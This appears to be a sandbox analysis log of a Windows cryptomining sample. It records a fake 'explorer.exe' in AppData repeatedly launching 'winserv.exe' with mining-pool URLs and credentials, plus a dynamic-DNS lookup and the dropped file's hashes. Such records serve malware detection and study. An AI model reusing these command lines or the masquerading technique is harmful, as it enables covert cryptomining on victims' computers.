C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
Files
C:\Users\Admin\AppData\Roaming\explorer.exe
| MD5 | c4ad493a6bfd212c4e1418ba605020af |
| SHA1 | 20272ac81bd1df68603924ae3b1fe4c2df034a29 |
| SHA256 | 492bd918e98e5802cf1ff5d3f0537567a7657477fff9cb5e7657448f64ead496 |
| SHA512 | 736487e85b4986284139599befb69a3483108c6199e6737524aafad9daa8614e67ab244859d71affacbcebba8e07af91fb2c4c10484f7988fa7dacd51897ccaf |